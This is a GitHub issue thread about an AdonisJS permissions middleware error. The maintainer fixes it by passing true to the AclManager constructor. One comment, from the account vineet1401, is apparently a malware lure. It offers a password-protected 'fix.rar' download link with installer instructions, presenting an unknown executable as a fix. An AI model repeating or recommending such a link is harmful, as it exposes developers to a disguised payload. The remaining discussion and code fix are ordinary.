### ISSUE TITLE
Server Middleware Error: Scope method call is not available on global ACL object

### ISSUE THREAD

**Issue by koficypher** [holoyan/adonisjs-permissions#14]
`import type { HttpContext } from '@adonisjs/core/http'
import type { NextFn } from '@adonisjs/core/types/http'
import { AclManager, Scope } from '@holoyan/adonisjs-permissions'

declare module '@adonisjs/core/http' {
  export interface HttpContext {
    acl: AclManager
  }
}

export default class UserScopeMiddleware {
  //@ts-ignore
  async handle(ctx: HttpContext, next: NextFn) {
    const scope = new Scope()
    ctx.acl = new AclManager().scope(scope)
    /**
     * Call next method in the pipeline and return its output
     */
    const output = await next()
    return output
  }
}`

This is the default server middleware that ships with the package but this errors out on the webpage saying
"Scope method call is not available on global Acl object, use AclManager to create new scoped object or use forceUpdate=true"

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by koficypher** [comment]
What's that supposed to do ? @vineet1401

**Comment by holoyan** [comment]
Hi @koficypher , sorry for late response

All you need to do just pass `true` value in constructor inside the `UserScopeMiddleware` middleware



```typescript

  async handle(ctx: HttpContext, next: NextFn) {
    const scope = new Scope()

  // here pass true
    ctx.acl = new AclManager(true).scope(scope)
    /**
     * Call next method in the pipeline and return its output
     */
    const output = await next()
    return output
  }

```

**Comment by koficypher** [comment]
Thanks that seems to have fixed it
